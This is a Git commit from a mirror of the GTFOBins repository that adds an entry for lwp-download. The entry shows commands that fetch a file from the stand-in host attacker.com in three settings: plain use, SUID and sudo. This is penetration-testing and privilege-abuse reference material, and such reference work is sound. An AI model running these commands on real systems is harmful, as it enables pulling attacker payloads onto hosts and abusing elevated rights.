1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

Create lwp-download.md

This commit is contained in:
bcoles 2020-03-17 17:19:30 +11:00 committed by Andrea Cardaci
parent a0132156fc
commit 279824d588

21
_gtfobins/lwp-download.md Normal file
View File

@ -0,0 +1,21 @@
---
functions:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
lwp-download $URL $LFILE
suid:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
./lwp-download $URL $LFILE
sudo:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
sudo -E lwp-download $URL $LFILE
---